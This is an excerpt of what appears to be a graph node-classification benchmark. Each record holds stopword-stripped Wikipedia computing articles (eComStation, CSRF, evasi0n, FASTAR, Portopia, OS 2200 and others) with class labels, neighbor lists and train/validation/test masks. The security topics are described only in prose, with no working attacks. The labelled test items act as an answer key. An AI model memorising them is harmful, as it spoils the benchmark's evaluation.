1.2. ecomstation 1.1 included several major new features compared version 1.0 largest change operating system installed package wide-ranging functional enhancements desktop environment workplace shell based open source xworkplace project netlabs.org included desktop folder enhancements status bars improved sorting options new virtual desktop feature customizable desktop toolbar support programmable widgets expanded configuration options various enhancements built-in support pppoe pptp internet connections also provided addition completely new install process designed bootable code installation cd rewritten improve compatibility modern bioses pre-boot menu introduced allowed user select various drivers kernel options use booting cd graphical installer ecomstation 1.0 replaced new streamlined interface ecomstation 1.1 based 2001 release ibm convenience package 2 os/2 warp version 4 also known mcp2 subsequent ibm service updates integrated version serenity systems separated base operating system product major commercial applications bundled ecomstation 1.0 base ecomstation 1.1 product sold title ecomstation entry applications including lotus smartsuite 1.7 hoblink x11 server packaged separately ecomstation application pack multi-processor support included ecomstation entry due additional license fees required ibm time instead smp package available ecomstation retailers paid extra release ecomstation 1.1 ecomstation server edition also made available based os/2 warp server e-business product besides english also german russian nlvs released ecomstation 1.1 principal new feature ecomstation 1.2 advertised revamped desktop multimedia support updated versions various bundled components ibm non-ibm also included ecomstation 1.2 released english german dutch nlvs serenity systems announced intention provide media refresh incorporating number fixes updates made available release ecomstation 1.2 released version 1.2r initially 12 november 2005 subsequently withdrawn re-released due last-minute bug fix 17 november 2005 principal new feature ecomstation 1.2r support installation athlon 64 systems previously possible awkward work-arounds ecomstation 1.2r released english german italian nlvs additionally beta release traditional chinese nlv made available via download registered customers ecomstation 2.0 longer-than-usual development cycle first beta released 21 december 2005 first self-styled release candidate announced 18 june 2007 final ga release available may 2010 biggest change ecomstation 2.0 addition acpi support represented first major update core operating system developed specifically ecomstation ibm benefits acpi included support modern hardware including advanced power-management features well support irqs 15 addition new acpi driver allowed access os/2 symmetric multi-processing support obviating need ibm proprietary smp-enablement driver consequently starting ecomstation 2.0 smp support included base product additional cost major feature introduced version 2.0 enhanced version journaled file system allowed operating system booted directly jfs-formatted partitions previous versions jfs usable non-bootable data partitions installing operating system onto jfs allowed significant performance improvement due much larger cache sizes supported jfs well reduced chkdsk times event non-clean shutdown ecomstation pricing model revamped significantly version 2.0 standard consumer version home student edition edition lower recommended retail price previous versions ecomstation however one customer limited five purchases business edition targeted commercial customers limit number purchases business edition also came telephone support whereas home student edition customers limited e-mail online assistance software-wise two products identical license terms differed noted editions ecomstation 2.0 included openoffice.org office suite provided separate cd application pack available previous versions discontinued ecomstation 2.0 available english release language versions deferred version 2.1 current version ecomstation 2.1 released year version 2.0 may 2011 version 2.1 two significant new features first support ahci disk controllers via newly developed device driver second replacement old ibm boot manager open-source air-boot software require primary partition therefore easier install disks pre-existing operating systems ecomstation 2.1 also updates included applications notably mozilla firefox minor improvements installer version 2.1 much former branding serenity systems removed released product replaced mensys bv ecomstation 2.1 currently available english german nlvs preview release japanese nlv also available certain customers nlvs including dutch italian reportedly development beta versions ecomstation 2.2 released 2013. ecomstation currently developed xeu.com various third party companies individuals although os/2 longer sold ibm ecomstation developed sold long remains profitable according serenity xeu.com important development ecomstation keeps adding value stakeholders involved recent major release version 2 released warpstock europe held 14–16 may 2010 updated version 2.1 followed year later may 2011 date last edition taken installation cds official release dates may different release dates refer us english editions unless otherwise noted ecomstation also complemented several open source applications included installer following open-source packages available ecomstation actively maintained see unix ports os/2 ecs netlabs ported packages also server edition based ibm os/2 warp server e-business minimum hardware requirements system running ecomstation 1.0 2.0 rc listed ecomstation number limitations relative operating systems currently available",
    "neighbors": [
      6675,
      6676,
      7187,
      10776,
      25,
      4637,
      9757,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      6231,
      10333,
      97,
      8298,
      10352,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      2193,
      9366,
      6296,
      11418,
      7325,
      9887,
      3248,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      5356,
      1776,
      5363,
      2811,
      3323,
      10499,
      4870,
      1804,
      3856,
      273,
      11539,
      10016,
      6434,
      5413,
      8998,
      2345,
      7983,
      823,
      4409,
      7483,
      7486,
      11075,
      4423,
      5457,
      11601,
      4438,
      10590,
      8551,
      7022,
      5492,
      6529,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      6062,
      11184,
      8627,
      6075,
      6078,
      9151,
      8136,
      7626,
      5078,
      6112,
      6128,
      2545,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 2463,
    "label": 3,
    "text": "Socket_F+:socket f+ socket f+ also socket fr2 internally cpu socket amd server processors starting 45 nm generation k10 cpu family successor socket f. main difference two sockets supported hypertransport version socket f supports hypertransport 2.0 1.0 ghz speed socket f+ supports hypertransport 3.0 2.6 ghz speed backwards compatible version 1.0 2.0",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4767,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1776,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 2464,
    "label": 4,
    "text": "Information_Networking_Institute:information networking institute information networking institute ini established carnegie mellon 1989 nation ’ first research education center devoted information networking integral department college engineering collaboration school computer science tepper school business heinz college ini ’ professional graduate degree programs represent fusion technologies economics policies secure communication networks systems services ini also partners research outreach entities extend educational training programs broad audience people using information networking part daily lives ini educational partner carnegie mellon cylab university-wide multidisciplinary research center involving 50 faculty 100 graduate students work ini cylab carnegie mellon university designated national security agency department homeland security national center academic excellence information assurance/cyber defense education cae-ia/cd national center academic excellence information assurance/cyber defense research cae-r also designated nsa u.s. cyber command national center academic excellence cyber operations cae-cyber ops designations ini cylab participate ini teaching faculty drawn ini also ongoing partnership university hyogo graduate school applied informatics faculty involved teaching advising ini programs conducting research aspects information networking information security affiliated research centers ini graduated 1,400 alumni currently occupy positions variety sectors across industry government academia",
    "neighbors": [
      10928,
      1746,
      5341,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 2465,
    "label": 9,
    "text": "Zend_Studio:zend studio zend studio commercial proprietary integrated development environment ide php developed zend technologies based php development tools pdt plugin eclipse platform pdt project led zend zend studio tightly integrated zend server zend pre-integrated tested php application stack integration enables developers quickly set complete php environment speed root cause analysis problems detected testing production environment zend studio also integrated zend framework example provides mvc view easy code navigation integration zend_tool automated code generation along zend server 2013 zend studio deployed 40,000 companies",
    "neighbors": [
      1668,
      1034,
      6154,
      9614,
      3986,
      11030,
      1687,
      2338,
      10020,
      9509,
      5546,
      2348,
      11446,
      4919,
      190,
      6338,
      2372,
      7364,
      8644,
      11208,
      1353,
      4171,
      6998,
      8539,
      10587,
      11357,
      3553,
      2658,
      10340,
      10341,
      7785,
      7147,
      2413,
      7022,
      4853,
      11259,
      7293,
      3583
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2466,
    "label": 7,
    "text": "Fast_automatic_restoration:fast automatic restoration fast automatic restoration fastar automated fast response system developed deployed american telephone telegraph 1992 centralized restoration digital transport network fastar automatically reroutes circuits spare protection capacity fiber-optic cable failure detected hence increasing service availability reducing impact outages network similar operation real-time restoration rtr developed deployed mci used mci network minimize effects fiber cut recovery technique used computer networks telecommunication networks mesh optical networks backup path alternate path affected traffic takes failure condition backup channel computed real time occurrence failure technique broadly classified two centralized restoration distributed restoration technique utilizes central controller access complete up-to-date accurate information network available resources resources utilized physical topology network service demands etc failure detected part network failure detection identification notification scheme central controller calculates new re-route path around failure based information database current state network new route backup path calculated central controller sends commands affected digital cross-connects make appropriate reconfigurations switching elements order implement new path fastar rtr restoration systems examples systems utilize restoration technique restoration technique central controller used hence up-to-date database state network needed scheme nodes network utilize local controllers local information particular node connected neighboring nodes available spare capacity links used connect neighbors state switching elements failure occurs part network local controllers handle computation re-routing affected traffic example approach technique utilized self-healing networks shn transport networks gradually developed digital cross connect system dcs -based mesh networks sonet ring networks optical mesh networks years recovery architecture used therein recovery architectures used different transport networks dcs-based mesh networks restoration ds3 facilities add-drop multiplexer adm -based ring protection sonet ring networks finally optical cross connect oxc -based mixed protection restoration optical mesh networks first restoration architecture used 1980s dcs-based mesh restoration ds3 facilities architecture utilized centralized restoration technique every restoration event coordinated network operation center noc restoration architecture path-based failure dependent utilized fault occurs fault detection isolation architecture capacity-efficient due use stub release slow failure recovery time time takes reestablish traffic continuity failure rerouting signals diverse facilities order minutes architecture implemented 1990s introduction sonet/sdh networks employed distributed protection technique utilizes either path-based upsr span-based blsr protection recovery path precomputed occurrence failure adm-based ring protection capacity-inefficient unlike dcs-based mesh restoration faster recovery time 50 ms recovery architecture used protection optical mesh networks introduced early 2000s protection architecture recovery time tens hundreds milliseconds significant improvement recovery time supported dcs-based mesh restoration unlike dcs-based mesh restoration recovery path predetermined pre-provisioned architecture also capacity efficiency seen preceding mesh restoration architecture dcs-based fastar uses dcs-based mesh restoration architecture architecture consists nodal equipment central control equipment data communication network interconnecting nodes central controller figure right explains architecture fastar different building blocks interact central processor called restoration provisioning integrated design rapid located noc responsible receiving analyzing alarm reports generated event fiber failure also handles alternate backup route computation re-routing affected traffic primary path already computed backup path path assurance tests enables roll-back traffic original path failure repaired rapid maintains up-to-date information state network available spare capacity central access display system cads provides craft interface rapid related restoration management systems traffic maintenance administration system tmas enables rapid perform control protection switch lock-out process protection channels used restoration sending commands line terminating equipment lte restoration network controllers rncs located central office co fiber optic network alarms generated affected digital access cross-connect system dacss lte sent rnc aged find alarm result transient correlated finally sent rapid via data communication network lte either ft series g digital transmission system add drop multiplexer adm reports fiber failure ltes rnc also provides rapid immediate access backup channels re-routing traffic path assurance tests restoration test equipment rte provides rapid means perform continuity tests used path assurance dacs responsible reporting fiber failures node failures occur within office rnc addition dacs enables automatic restoration providing central processor access remotely perform cross-connects ds-3 level data communication network used connect nodal equipments central controller achieve needed availability network full redundancy used form two totally diverse terrestrial satellite-based networks event major restoration process one networks support communication burden absence fastar operates ds-3 level restore individual smaller demands fastar restores 90 95 percent affected ds-3 demand within two three minutes fiber-optic cut occurs output dacs equipment input another rnc collects alarms affected ltes rnc ages alarms sends rapid rapid determines amount spare capacity available failure identifies ds-3 demands affected finds restoration route affected traffic sequential order priority sends command appropriate dacss implement re-route thus establishing restoration figure right route exists node node q via nodes c f k l. event fiber-optic cable failure nodes f k lte ft series g adm two offices detects sends alarm reports failure respective rncs rncs age alarm send reports rapid located noc rapid initiates time window ensure related alarms generated rncs affected nodes rnc office whose traffic utilizes f k failed fiber optic cable window times rapid performs route computation establish new backup path traffic node node q creates new route c f g j k l. route computation also done sequentially order priority traffic two nodes network utilize failed fiber-optic cable backup path traffic going nodes f k computed rapid ensures continuity connectivity along established back-up paths sending command rncs located q turn use test signal generated respective rte check continuity link connectivity backup path verified traffic nodes q transferred backup path commanding dacs iiis make appropriate cross connections rapid performs service verification test verify service transfer successful test returns positive result service transfer successful else service transfer unsuccessful needs repeated service traffic transfer process performed traffic going affected fiber optic cable f–k fastar restores much affected traffic demand available protection capacity allow shared risk link groups srlgs refer situations links connect two distinct nodes offices network share common conduit configuration links group shared risk one link fails links group may fail majority networks use today utilize srlgs times access building across bridge single conduit restore traffic link two offices nodes share srlg links event conduit cut least one two offices must fastar-ompliant cut srlg1 would restorable using fastar fastar implemented either office b b c yet fastar-compliant given failure srlg2 ds-3 traffic link 3 would restored fastar via newly re-computed backup path ds-3 traffic link 2 would restored fastar implemented either office b c. restore three links event failure srlgs fastar implemented offices c. failure srlg1 would cause fastar automatically re-route traffic link 1 3 via two re-computed backup paths also another time failure srlg2 detected reported rapid traffic link 2 3 re-routed new backup path fastar network management used integrate analyze different data alarms supplied various system elements make fastar architecture centralized display troubleshoot isolate problems fault management analysis corrective action taken fastar network management cuts across three tiers",
    "neighbors": [
      9098,
      6267,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 2467,
    "label": 4,
    "text": "Evasi0n:evasi0n evasi0n stylized evasi0n jailbreak program ios 6.0 6.1.2 ios 7.0 7.0.6 evasi0n7 known portable code base minimal use arbitrary code execution seven million copies evasi0n downloaded presumably installed first four days release released 4 february 2013 four six exploits used patched apple 18 march 2013 release ios 6.1.3 meant end original version evasi0n 22 december 2013 evad3rs released new version evasi0n supports ios 7.x known evasi0n7 one major exploit used jailbreak patched apple 4th beta ios 7.1 two beta 5 final release ios 7.1 fixed exploits used evasi0n7 evasi0n jailbreak specifically breaches modern security features address space layout randomization kernel space version launchd hard-coded list exclusive services serve device stability well vendor lock-in ios evasi0n reads fixed data vectors locate random address kernel space utilizes codice_1 file launchd processes regardless list exclusive services",
    "neighbors": [
      6797,
      8877,
      7983,
      5682,
      3286,
      823,
      5176,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 2468,
    "label": 2,
    "text": "Mac_Box_Set:mac box set mac box set software package made apple inc. including latest version os x mac os x iwork ilife mac box set updated twice original release first release introduced shipped date ilife iwork '09 january 9 2009 included retail discs mac os x 10.5.6 leopard ilife '09 iwork '09 commonly called mac box set '09 next release started shipping shortly mac os x snow leopard introduced thing changed release mac os x version 10.6.3 snow leopard shipped ilife '11 introduced ilife version updated everything else stayed versions mac box set",
    "neighbors": [
      3691
    ],
    "mask": "None"
  },
  {
    "node_id": 2469,
    "label": 3,
    "text": "The_Portopia_Serial_Murder_Case:portopia serial murder case often translated portopia serial murder case english adventure game designed yuji horii published enix first released nec pc-6001 june 1983 since ported personal computers nintendo famicom mobile phone services game player must resolve murder mystery searching clues exploring different areas interacting characters solving item-based puzzles game features first-person graphics nonlinear gameplay open world conversations non-player characters branching dialogue choices suspect interrogations nonlinear storytelling plot twists famicom version also features command menu system point-and-click interface 3d dungeon maze upon release portopia serial murder case well received japan became influential title helped define visual novel genre portopia serial murder case follows first-person perspective narrative various events described still pictures text messages player interacts game using verb-noun parser requires typing precise commands keyboard finding exact words type considered part riddles must solved sound effects present game lacks music save function features conversation system branching dialogue choices story develops entering commands receiving answers player sidekick non-player characters game features nonlinear gameplay allowing multiple different ways achieve objectives includes travelling different areas open world making choices determine dialogues order events well alternative endings depending player identifies culprit however one characters true culprit others red herrings player closes case wrong culprit player face criticism police chief need re-open case game includes phone could used manually dial number needed contact several non-player characters game also features inventory system requiring examination collection items could used evidence later game keyboard famicom version replaces verb-noun parser menu list fourteen set commands selectable gamepad similar command selection menu system introduced yuji horii murder mystery adventure game released 1984 pc famicom releases portopia one commands menu allowed player use point-and-click interface using d-pad move cursor screen order look clues hotspots famicom version portopia also features branching menu selections includes using pointer magnifying glass investigate objects needed find hidden clues fist hammer hit anything anyone could used carry beatings suspect interrogations additional sequences also added notably underground dungeon maze style similar role-playing video games although story game fictional set real japanese cities mainly kobe addition sequences kyoto sumoto president successful bank company found dead secretary inside locked room mansion signs seem indicate kouzou stabbed however police sends detective investigate detective charge case unnamed unseen silent protagonist essentially embodies player simply referred works assistant named nicknamed one actually speaks executes player commands characters include among others daughter man named kouzou nephew heir stripper game conceived yuji horii around 1981 27 years old shortly bought first computer learned program modifying games time read pc magazine article computer game genre united states text adventures horii noticed lack games japanese market decided create adventure game horii also cited manga authors tetsuya chiba mitsuru adachi katsuhiro otomo influences game developed using basic programming language horii wanted expand adventure game genre ideas one concept create program story would develop entering command receiving answer idea game progresses conversations human computer started get ambitious thought could make computer converse enough data entered attempting create artificial intelligence language algorithm however realized n't possible computers time created dialogue computer beforehand player could type words computer would reply back reaction another concept contrast linear stories adventure games time idea branching non-linear storytelling main scenario take 20 game ’ content remaining 80 response various actions player however due pc memory limitations able create several short branching scenarios still found interesting one long linear scenario also conceived graphical format picture on-screen representing happening command menu system select action later became standard format japanese adventure games following 1983 release game ported various japanese personal computers famicom port released 1985 first adventure game released platform famicom version also first collaboration yuuji horii koichi nakamura chunsoft dragon quest famicom version programmed nakamura 19 years old time version portopia changed interface adopting command menu system horii created 1984 adventure game due frustration text-based entry admitting never able get far adventure games horii created command menu system hokkaido later used famicom version portopia horii also noted famicom versions portopia hokkaido wanted make appealing mature audience beyond famicom typical younger audience also playing wizardry time inspiring include 3d dungeon maze famicom version portopia game never released western world largely due mature content involving themes murder suicide fraud bankruptcy interrogation beatings drug dealings strip club lack western release prompted rom hacking group dvd translations develop unofficial translation famicom version first mobile phone version game branded part trilogy along mobile versions hokkaido rensa satsujin okhotsk ni kiyu karuizawa yūkai annai released 2003 ezweb yahoo keitai services features list set commands similar famicom version also improved graphics free-moving cursor save function games trilogy retitled re-released 2005 2006 services second portopia version possesses content first mobile one addition updated graphics background music bonus function obtained completing game hint option nullifies ending bonus used frequently famicom version game sold 700,000 copies game well received japan allowing multiple ways achieve objectives well-told storyline surprising twist ending japanese press described game without game technically way lose according square enix first real detective adventure game game along super mario bros. inspired hideo kojima creator metal gear series enter video game industry praised portopia mystery drama humor 3d dungeons providing proper background explanation behind murderer motives expanding potential video games kojima considers one three influential games played influence evident games including metal gear series snatcher pc-6001 version portopia serial murder case included hidden secret portopia also one first video games ever played nintendo eiji aonuma went become director legend zelda series starting ocarina time portopia influence also evident horii later work including seminal role-playing game dragon quest used storytelling techniques menu interface portopia john szczepaniak retro gamer considers one influential games responsible defining visual novel genre comparing role super mario bros. tetris street fighter defining respective genres platform game puzzle game fighting game respectively 2003 portopia serial murder case ranked 19th poll determine thirty best famicom games poll conducted tokyo metropolitan museum photography part level x exhibition english-language webzine retrogaming times monthly compared game later-released shadowgate player must examine collect objects find true purpose later recommended portopia fans slower paced games require players think puzzles john szczepaniak praised pacing quality writing considers gameplay plot sophisticated time noted contains elements found number later titles including déjà vu snatcher nine hours nine persons nine doors 1up also noted portopia similar icom simulations déjà vu released several years later nintendo successful series adventure games also inspired portopia usgamer compared later police quest adventure games csi television series well classic sherlock holmes novels according official xbox magazine portopia features point-and-click murder mystery plot open world suspect interrogations nonlinear gameplay dialogue choices alternate endings standard 2015 way ahead time 1983 comparing l.a. noire peter tieryas gave portopia positive retrospective review stating influence undeniable tragic back story strange vicissitudes characters face uncanny freedom investigate haunting uncovering killer makes special",
    "neighbors": [
      7780,
      8262,
      10855,
      8232,
      9006,
      7023,
      6077,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2470,
    "label": 4,
    "text": "Cross-site_request_forgery:cross-site request forgery cross-site request forgery also known one-click attack session riding abbreviated csrf sometimes pronounced sea-surf xsrf type malicious exploit website unauthorized commands transmitted user web application trusts many ways malicious website transmit commands specially-crafted image tags hidden forms javascript xmlhttprequests example work without user interaction even knowledge unlike cross-site scripting xss exploits trust user particular site csrf exploits trust site user browser csrf vulnerabilities known cases exploited since 2001 carried user ip address website logs might evidence csrf exploits under-reported least publicly 2007 well-documented examples new attacks web-enabled devices carried 2018 including attempts change dns settings routers router manufacturers hurriedly released firmware updates improve protection advised users change router settings reduce risk details released citing obvious security reasons attackers find reproducible link executes specific action target page victim logged embed link page control trick victim opening attack carrier link may placed location victim likely visit logged target site example discussion forum sent html email body attachment real csrf vulnerability utorrent cve-2008-6586 exploited fact web console accessible localhost:8080 allowed critical actions executed using simple get request attacks launched placing malicious automatic-action html image elements forums email spam browsers visiting pages would open automatically without much user action people running vulnerable utorrent version time opening pages susceptible attack csrf attacks using image tags often made internet forums users allowed post images javascript example using bbcode accessing attack link local utorrent application localhost:8080 browser would also always automatically send existing cookies domain general property web browsers enables csrf attacks exploit targeted vulnerabilities execute hostile actions long user logged target website example local utorrent web interface time attack cross-site request forgery confused deputy attack web browser csrf commonly following characteristics risk web applications perform actions based input trusted authenticated users without requiring user authorize specific action user authenticated cookie saved user web browser could unknowingly send http request site trusts user thereby causes unwanted action utorrent example described attack facilitated fact utorrent web interface used get request critical state-changing operations change credentials download file etc explicitly discourages assumption many existing csrf prevention mechanisms web frameworks cover get requests rather apply protection http methods intended state-changing attacker may forge request log victim target website using attacker credentials known login csrf login csrf makes various novel attacks possible instance attacker later log site legitimate credentials view private information like activity history saved account attack demonstrated google yahoo depending type http request methods vary susceptibility csrf attacks due differences handling web browsers therefore protective measures attack depend method http request additionally typically described static type attack csrf also dynamically constructed part payload cross-site scripting attack demonstrated samy worm constructed fly session information leaked via offsite content sent target malicious url csrf tokens could also sent client attacker due session fixation vulnerabilities guessed via brute-force attack rendered malicious page generates thousands failed requests attack class dynamic csrf using per-client payload session-specific forgery described 2009 nathan hamiel shawn moyer blackhat briefings though taxonomy yet gain wider adoption new vector composing dynamic csrf attacks presented oren ofer local owasp chapter meeting january 2012 – ajax hammer – dynamic csrf severity metrics issued csrf vulnerabilities result remote code execution root privileges well vulnerability compromise root certificate completely undermine public key infrastructure several things happen cross-site request forgery succeed attack blind attacker see target website sends back victim response forged requests unless exploit cross-site scripting bug target website similarly attacker target links submit forms come initial forged request subsequent links forms similarly predictable multiple targets simulated including multiple images page using javascript introduce delay clicks given constraints attacker might difficulty finding logged-in victims attackable form submissions hand attack attempts easy mount invisible victims application designers less familiar prepared csrf attacks say password cracking dictionary attacks csrf prevention techniques work embedding additional authentication data requests allows web application detect requests unauthorized locations synchronizer token pattern stp technique token secret unique value request embedded web application html forms verified server side token may generated method ensures unpredictability uniqueness e.g using hash chain random seed attacker thus unable place correct token requests authenticate example stp set django html form stp compatible relies html introduces complexity server side due burden associated checking validity token request token unique unpredictable also enforces proper sequence events e.g screen 1 2 3 raises usability problem e.g user opens multiple tabs relaxed using per session csrf token instead per request csrf token web applications use javascript majority operations may use anti-csrf technique relies same-origin policy security technique based assumption javascript running within origin able read cookie value javascript running rogue file email able read copy custom header even though csrf-token cookie automatically sent rogue request server still expecting valid x-csrf-token header csrf token unique unpredictable may generated randomly may derived session token using hmac csrf token cookie must httponly flag intended read javascript design technique implemented many modern frameworks django angularjs token remains constant whole user session works well ajax applications enforce sequence events web application protection provided technique thwarted target website disables same-origin policy using one following techniques similarly cookie-to-header approach without involving javascript site set csrf token cookie also insert hidden field html form sent client form submitted site check cookie token matches form token same-origin policy prevents attacker reading setting cookies target domain put valid token crafted form advantage technique synchronizer pattern token need stored server browser extensions requestpolicy mozilla firefox umatrix firefox google chrome/chromium prevent csrf providing default-deny policy cross-site requests however significantly interfere normal operation many websites csfire extension also firefox mitigate impact csrf less impact normal browsing removing authentication information cross-site requests noscript extension firefox mitigates csrf threats distinguishing trusted untrusted sites removing authentication payloads post requests sent untrusted sites trusted ones application boundary enforcer module noscript also blocks requests sent internet pages local sites e.g localhost preventing csrf attacks local services utorrent routers self destructing cookies extension firefox directly protect csrf reduce attack window deleting cookies soon longer associated open tab various techniques used proposed csrf prevention historically cross-site scripting xss vulnerabilities even applications running domain allow attackers bypass essentially csrf preventions",
    "neighbors": [
      5636,
      774,
      3462,
      3473,
      11537,
      1812,
      7965,
      10398,
      9125,
      5543,
      10412,
      5934,
      5682,
      5433,
      700,
      4797,
      1597,
      3391,
      575,
      450,
      7368,
      10571,
      10831,
      10579,
      87,
      4956,
      5724,
      7644,
      479,
      10466,
      4453,
      4198,
      7530,
      6636,
      8045,
      113,
      5107,
      3700,
      8694,
      119,
      3707,
      10492,
      510
    ],
    "mask": "None"
  },
  {
    "node_id": 2471,
    "label": 3,
    "text": "Semantic_Interoperability_Community_of_Practice:semantic interoperability community practice semantic interoperability community practice sicop group people seek make semantic web operational respective settings achieving semantic interoperability semantic data integration sicop seeks enable semantic interoperability specifically operationalizing relevant technologies approaches online conversation meetings tutorials conferences pilot projects activities aimed developing disseminating best practices individuals making community practice various settings however sicop claims neither formal implied endorsement organization",
    "neighbors": [
      10452
    ],
    "mask": "None"
  },
  {
    "node_id": 2472,
    "label": 4,
    "text": "Domain_Assurance_Council:domain assurance council domain assurance council dac trade association started summer 2006 paul hoffman john levine members dac divided categories include",
    "neighbors": [
      182,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 2473,
    "label": 2,
    "text": "Bélády's_anomaly:bélády anomaly computer storage bélády anomaly phenomenon increasing number page frames results increase number page faults certain memory access patterns phenomenon commonly experienced using first-in first-out fifo page replacement algorithm fifo page fault may may increase page frames increase optimal stack-based algorithms like lru page frames increase page fault decreases lászló bélády demonstrated 1969 common computer memory management information loaded specific-sized chunks chunk referred page main memory hold limited number pages time requires frame page load page fault occurs page found might need loaded disk memory page fault occurs frames use one must cleared make room new page simple algorithm fifo whichever page frames longest one cleared bélády anomaly demonstrated believed increase number page frames would always result number fewer page faults bélády nelson shedler constructed reference strings fifo page replacement algorithm produced nearly twice many page faults larger memory smaller one formulated conjecture 2 general bound 2010 fornai iványi showed anomaly fact unbounded one construct reference string arbitrary page fault ratio",
    "neighbors": [
      5840,
      1801,
      2250,
      3615
    ],
    "mask": "Test"
  },
  {
    "node_id": 2474,
    "label": 2,
    "text": "SignalR:signalr signalr software library microsoft asp.net allows server code send asynchronous notifications client-side web applications library includes server-side client-side javascript components asp.net signalr library asp.net developers add real-time web functionality applications real-time web functionality ability server-side code push content connected clients happens real-time signalr takes advantage several transports automatically selecting best available transport given client server best available transport signalr takes advantage websocket html5 api enables bi-directional communication browser server signalr use websockets covers available gracefully fall back techniques technologies n't application code remains signalr also provides simple high-level api server-to-client rpc call javascript functions client browser server-side .net code asp.net application well adding useful hooks connection management connect/disconnect events grouping connections authorization",
    "neighbors": [
      9441,
      9834,
      6797,
      7983,
      10353,
      2804,
      11221
    ],
    "mask": "None"
  },
  {
    "node_id": 2475,
    "label": 7,
    "text": "Manaba:manaba manaba cloud-based collaborative learning system developed internet service provider asahi net inc. manaba developed 2007 collaboration two private universities japan initially designed connect students teachers enable students accumulate learning evidence elevate learning outcomes mutual review known intuitive interface meaningful design focused learning outcomes flexibility scalability cloud application manaba adopted approximately 200 educational institutions globally december 31 2013 manaba provides spaces teachers conduct surveys tests collect assignments enable group projects facilitate online discussions students also review work develop debates course materials manaba provides individual space student accumulate learning evidence time share others reflect back previous work instructors assess learning outcomes looking students ’ portfolios collectively manaba creates spaces groups engage community discussions various topics name “ manaba ” comes two japanese words manabu 学 ba 場 manabu means learning ba activity place events occur",
    "neighbors": [
      5612,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 2476,
    "label": 2,
    "text": "RTX_(operating_system):rtx operating system rtx line real-time operating system rtos extensions firm intervalzero software extension abstraction layer converts microsoft windows operating system rtos first windows real-time solution market rtx real-time software extensions windows combines familiar user experience microsoft windows rich gui extant drivers software ... direct control embedded hardware providing hard real-time determinism symmetric multiprocessing smp abilities rtx extensions followed windows architecture since windows nt 3.5 generally rtx supports 32-bit windows rtx64 supports 64-bit windows 2015 rtx2016 supports 32-bits rtx64 3.0 supports 64-bits systems used different markets industrial automation testbed simulation digital audio digital video aerospace military medical devices electrical grid electricity generation uses",
    "neighbors": [
      6403,
      6797,
      11413,
      9366,
      5531,
      10924,
      7983,
      6207,
      3272,
      2379,
      2383,
      5457,
      5469,
      5470,
      5472,
      10085,
      5356,
      4589,
      1776,
      6128,
      499,
      636,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2477,
    "label": 2,
    "text": "OS_2200:os 2200 os 2200 operating system unisys clearpath dorado family mainframe systems operating system kernel os 2200 lineal descendant exec 8 univac 1108 documentation information current past unisys systems found unisys public support website see unisys 2200 series system architecture description machine architecture relationship os 2200 operating system earlier 1100 systems going back 1101 1951 1108 first 1100 series computer designed efficient support multiprogramming multiprocessing along new hardware came operating system exec 8 executive system 1108 univac 1108 computer announced 1964 delivered late 1965 first 1108 computers used exec exec ii developed univac 1107 however univac planned offer symmetric multiprocessor versions 1108 4 processors earlier operating systems really basic monitor programs n't designed even though supported limited multiprogramming univac 1110 introduced 1972 operating system name changed os 1100 reflect support wider range systems name os 1100 retained 1988 introduction sperry 2200 series follow 1100 series name changed os 2200 since time 2200 series became unisys clearpath ix series unisys clearpath dorado series operating system retained os 2200 name company name product names also changed time engineering research associates era saint paul acquired remington rand corporation remington rand also acquired eckert–mauchly computer corporation philadelphia building univac computer two combined univac division remington rand direction william norris william norris one founders era later left remington rand start control data corporation univac division remington rand corporation became univac division sperry rand corporation remington rand merged sperry corporation 1970s sperry rand began corporate identity program changed name sperry corporation division names begin sperry computer systems division became sperry univac later division names dropped everything simply became sperry operating system kernel still referred exec unisys customer personnel however unisys began releasing suites products tested together system base releases later called clearpath os 2200 release n term os 2200 changed refer entire suite products system release others bis released asynchronously dorado hardware platforms 1986 burroughs sperry corporations merged become unisys long time 2200 series clients say stands univac still supplier major mainframe product lines companies continued development including mcp operating system burroughs os 2200 sperry 2016 unisys made virtual microsoft windows version os2200 available cost educational leisure purposes exec 8 sometimes referred exec viii univac operating system developed univac 1108 1964 combined best features earlier operating systems exec exec ii used univac 1107 exec 8 one first commercially successful multiprocessing operating systems supported simultaneous mixed workloads comprising batch time-sharing real-time one file system flat naming structure across many drums spindles also supported well-received transaction processing system previous systems real-mode systems hardware support protection separation programs operating system support multiprogramming previous systems limited running one user job concurrently multiple supporting functions known well-behaved card reader printer card punch spoolers exec 8 operating system designed beginning multiprogramming multiprocessing operating system 1108 designed four cpus memory mass storage primary system constraints 1100 series envisioned targeting general market extreme real time processing primary requirement specifications exec 8 drawn december 1964 preliminary programmers reference manual user guide work began may 1965 exec 8 began real time operating system early use mostly general scientific engineering work also used message switching process control simulation missile firing control designed run systems often 128k words 576 k bytes—less maximum memory size ibm pc xt focused real time batch processing earliest release levels work 128kw increasing functionality later releases made untenable since n't leave enough space programs useful size maximum memory capacity 1108 256kw 1,148 kb efficient use memory important constraint since core memory expensive part system mass storage consisted 6-foot long rotating drums held 256kw fh-432 2mw fh-1782 highest capacity mass storage fastrand drum held 22 mw 99 mb file fragmentation dealt process called file save generally done per day night involved rolling files tape reinitializing drum file system reading files back severe memory constraints real time use keeping single copy code loaded core requirement since 1108 designed multitasking system fully reentrant thread safe reentrant module accessed program data single memory base address different instance run data switching execution contexts could done single instruction merely setting different base address single register system used fine-grained locking protect shared data structures executive compilers utilities even sophisticated user applications might 